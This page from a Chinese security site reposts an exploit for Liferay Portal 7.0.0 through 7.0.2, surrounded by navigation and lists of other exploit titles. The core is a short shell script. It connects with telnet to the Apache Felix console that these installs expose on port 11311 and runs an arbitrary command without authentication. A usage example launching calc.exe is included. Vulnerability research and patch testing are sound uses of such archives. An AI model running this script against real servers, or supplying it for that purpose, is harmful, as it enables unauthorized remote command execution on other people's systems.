首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE
来源:@dronesec 作者:drone 发布时间:2014-12-31  
#!/bin/sh
  
# Exploit title: Liferay Portal 7.0 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0/7.0.1/7.0.2
# Fixed in: 7.0.3
# Tested on: Windows 7
  
# Pre-auth command injection using an exposed Apache Felix, 
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#
  
  
(echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ProjectSend Arbitrary File Upl
·PHPads <= 213607 - Authenticat
·Desktop Linux Password Stealer
·i-FTP Schedule Buffer Overflow
·Maxthon Browser Address Bar Sp
·WordPress RevSlider Local File
·jetAudio 8.1.3.2200 Crash Proo
·Malicious Git And Mercurial HT
·WhatsApp <= 2.11.476 - Remote
·ASUSWRT 3.0.0.4.376_1071 - LAN
·WordPress Themes download.php
·SkinCrafter3_vs2005 ActiveX Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved